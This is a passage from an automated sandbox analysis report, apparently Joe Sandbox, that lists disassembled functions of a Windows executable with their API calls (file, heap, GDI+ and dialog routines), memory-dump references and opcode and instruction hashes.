                                                                                                                    • Opcode Fuzzy Hash: 5f1ac655e5c1888ac9eaf448aa30f01ac33fca869dc55f597100c466d75a48c8
                                                                                                                    • Instruction Fuzzy Hash: D2314871904209AFCF15DFA9D949AEEBBF6AF48304F1014AEE845B7251CB325E51CB60
                                                                                                                    Function 00E39DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E373BC,?,?,?,00000000), ref: 00E39DBC
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E39E70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1392018926-0
                                                                                                                    • Opcode ID: 02c778537758c1aa197f641423748a3d13eade7c8ab297c4ee82703eb3c371ec
                                                                                                                    • Instruction ID: 2a7494265b61788e3ed32883b84b330928de35929b4c75870a6e5f4da27149c9
                                                                                                                    • Opcode Fuzzy Hash: 02c778537758c1aa197f641423748a3d13eade7c8ab297c4ee82703eb3c371ec
                                                                                                                    • Instruction Fuzzy Hash: 04210431248246AFC714DF75C89AAABBFE4AF55308F48585CF4C593142D368D90CCB61
                                                                                                                    Function 00E3966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E39F27,?,?,00E3771A), ref: 00E396E6
                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E39F27,?,?,00E3771A), ref: 00E39716
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: ab233e33402941e0359e61d1eb386bac5178ba805289d847d17928565715e9ce
                                                                                                                    • Instruction ID: 10e2aa3d81b1e1bc3e71818680204d686a9f641a8870ce0bdfdc18b7436274df
                                                                                                                    • Opcode Fuzzy Hash: ab233e33402941e0359e61d1eb386bac5178ba805289d847d17928565715e9ce
                                                                                                                    • Instruction Fuzzy Hash: 1421C1715003446FE3708A65CC8EBE7BBDCEB49364F101A19FA96E25D2C7B4A884C631
                                                                                                                    Function 00E39E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E39EC7
                                                                                                                    • GetLastError.KERNEL32 ref: 00E39ED4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: fd4fa9719c356dabb24492cdd9a354d096dc48ac2a81ab67e31cc7f5efe61ca6
                                                                                                                    • Instruction ID: c03d5298bfa062cd2c2b27425abb71b72befa2c9a7ab72b93e1c6c31b1aed742
                                                                                                                    • Opcode Fuzzy Hash: fd4fa9719c356dabb24492cdd9a354d096dc48ac2a81ab67e31cc7f5efe61ca6
                                                                                                                    • Instruction Fuzzy Hash: 0711E131600700ABE724D63AC889BA6BBE9AB44374F605A69E153F26D1D7F0ED49C760
                                                                                                                    Function 00E58E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00E58E75
                                                                                                                      • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00E71098,00E317CE,?,?,00000007,?,?,?,00E313D6,?,00000000), ref: 00E58EB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    • Opcode ID: 5e50af13764e8a7e97bb20750b4b55b45c3786f0550d67b3b0b2cdd845442c2d
                                                                                                                    • Instruction ID: 291b162f3ed3accb466ad1f6318cf4c32f381eccf0d5a6de0c6f67ed0d6d942d
                                                                                                                    • Opcode Fuzzy Hash: 5e50af13764e8a7e97bb20750b4b55b45c3786f0550d67b3b0b2cdd845442c2d
                                                                                                                    • Instruction Fuzzy Hash: EFF0FC322011156ACB312A266E07BAF37B88F81B73F142D16FD14B6192DF70CD0C85A0
                                                                                                                    Function 00E4109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00E410AB
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00E410B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    • Opcode ID: 4166c2453fd0f5756a3c2e860064d718086a204408e5e6bd73a4578d3de7f3e3
                                                                                                                    • Instruction ID: 412bcbbbe90486b6f86013e258a989a34bee01b7d8d700fc2caec197919fe0bf
                                                                                                                    • Opcode Fuzzy Hash: 4166c2453fd0f5756a3c2e860064d718086a204408e5e6bd73a4578d3de7f3e3
                                                                                                                    • Instruction Fuzzy Hash: 63E0D872F00145ABCF0D87B5BC058EB73DDEB4424831051B5E403F3101F970DE854660
                                                                                                                    Function 00E3A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A501
                                                                                                                      • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A532
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: 16d89599cbe74d59fe1f8459a579c21c6dea981511b81fac4414e5cb187fd426
                                                                                                                    • Instruction ID: 02e7b44f90d25e059c57099f8c9d58527bf93839d84a007a05d1217943acb5a4
                                                                                                                    • Opcode Fuzzy Hash: 16d89599cbe74d59fe1f8459a579c21c6dea981511b81fac4414e5cb187fd426
                                                                                                                    • Instruction Fuzzy Hash: FAF0A0312001097BDF015F60EC45FDA3BACBB04385F488060B945E5160DB71CAD8DB10
                                                                                                                    Function 00E3A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641,000000FF), ref: 00E3A1F1
                                                                                                                      • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641), ref: 00E3A21F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    • Opcode ID: e30ef224bdba4322c379a1b1a1128e8f658354686c7d4c52210b870d930fea17
                                                                                                                    • Instruction ID: baca7a29938a7102f6b7ce9c8db041427494030d10c5ff4ced5ead67d01c2a0b
                                                                                                                    • Opcode Fuzzy Hash: e30ef224bdba4322c379a1b1a1128e8f658354686c7d4c52210b870d930fea17
                                                                                                                    • Instruction Fuzzy Hash: 7BE092315402196BDB515F61EC49FDA7B9CBB083C5F484061B945F2060EB61DEC8DA60
                                                                                                                    Function 00E4AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00E62641,000000FF), ref: 00E4ACB0
                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00E62641,000000FF), ref: 00E4ACB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    • Opcode ID: e5ccc056c56558fb1fc28cbbbfcdba3975b090e41ae854cff90fb24afa7a09c1
                                                                                                                    • Instruction ID: d49bb656e9073ca42ee4b84290525dd0f2f5a12026633faadb411c57f760965b
                                                                                                                    • Opcode Fuzzy Hash: e5ccc056c56558fb1fc28cbbbfcdba3975b090e41ae854cff90fb24afa7a09c1
                                                                                                                    • Instruction Fuzzy Hash: D0E06572544650EFC710DB59EC06B49FBA8FB48B60F00426AF416E3770CB746840CA90
                                                                                                                    Function 00E3A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00E3A23A,?,00E3755C,?,?,?,?), ref: 00E3A254
                                                                                                                      • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E3A23A,?,00E3755C,?,?,?,?), ref: 00E3A280
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: bb9a3713d05ed71353f75a07bb6dcd2c7827c93e5a07d55d4a602a2e293b1a22
                                                                                                                    • Instruction ID: 506ec638c4ca5fc596436e1a4ac17dadeabe59b6e1ac21f96c2086e8b8b8565b
                                                                                                                    • Opcode Fuzzy Hash: bb9a3713d05ed71353f75a07bb6dcd2c7827c93e5a07d55d4a602a2e293b1a22
                                                                                                                    • Instruction Fuzzy Hash: BEE01B359001245BCB51AB64DC09BDABB9CAB183E5F044271FD55F3195D771DE88C6A0
                                                                                                                    Function 00E4DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00E4DEEC
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00E4DF03
                                                                                                                      • Part of subcall function 00E4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
                                                                                                                      • Part of subcall function 00E4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
                                                                                                                      • Part of subcall function 00E4B568: IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
                                                                                                                      • Part of subcall function 00E4B568: TranslateMessage.USER32(?), ref: 00E4B5AC
                                                                                                                      • Part of subcall function 00E4B568: DispatchMessageW.USER32(?), ref: 00E4B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    • Opcode ID: dce2a1825e0c81a4cc925576e3d01366c2314eb6b287096b21172793f31e36d2
                                                                                                                    • Instruction ID: 72a93d70062b4c525cd4300e3e709837e8eaa8721ea2002e715b246026aa41f6
                                                                                                                    • Opcode Fuzzy Hash: dce2a1825e0c81a4cc925576e3d01366c2314eb6b287096b21172793f31e36d2
                                                                                                                    • Instruction Fuzzy Hash: A2E09BB55002482ADF01AB61DC0EF9E3BAC5B15785F040452B204F61F2E978E6549761
                                                                                                                    Function 00E4081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    • Opcode ID: 05c74a8a62085f08bfe35476abf5b9089abae1b253a397450f79af8f542ae125
                                                                                                                    • Instruction ID: b27590f456fea832bfdd668d659b8e891567398157808663932551de027b5818
                                                                                                                    • Opcode Fuzzy Hash: 05c74a8a62085f08bfe35476abf5b9089abae1b253a397450f79af8f542ae125
                                                                                                                    • Instruction Fuzzy Hash: F6E01A768001686ADB11ABA5AC49FDB7BACAF093D1F040065B649F2145DAB4DA88CBA0
                                                                                                                    Function 00E4A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E4A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E4A3E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    • Opcode ID: 300133c2e1819a6dbecc18ab392056a3f82ae9c3f3df3e76fda782de10bec8e1
                                                                                                                    • Instruction ID: d55b53837bd03ee65463682a226ccd44d13e5e4d0694f9b316b1c9f73b0b0572
                                                                                                                    • Opcode Fuzzy Hash: 300133c2e1819a6dbecc18ab392056a3f82ae9c3f3df3e76fda782de10bec8e1
                                                                                                                    • Instruction Fuzzy Hash: 52E0ED71501218EBCB20DF55D54569EBBE8EB15364F10906AA886A3341E374AE04DB91
                                                                                                                    Function 00E52B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E52BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E52BB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    • Opcode ID: edc47ddb2bf8ae4fa4b04567133e9480132a19bd86d8b84faf105db602c9249d
                                                                                                                    • Instruction ID: 27d48087b7faeab8779a01cd496256d041151213c069d580d7fd7377ad9bd0ca
                                                                                                                    • Opcode Fuzzy Hash: edc47ddb2bf8ae4fa4b04567133e9480132a19bd86d8b84faf105db602c9249d
                                                                                                                    • Instruction Fuzzy Hash: AFD0A9391543002ACC942A70280A4892395AE43BBB7E03F8EEE20B54C2EB12904CA122
                                                                                                                    Function 00E312F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    • Opcode ID: 5867490fb770ca9928962a48f9ad7a0c70cbe8cadfeea8ac20a692dfaf899d72
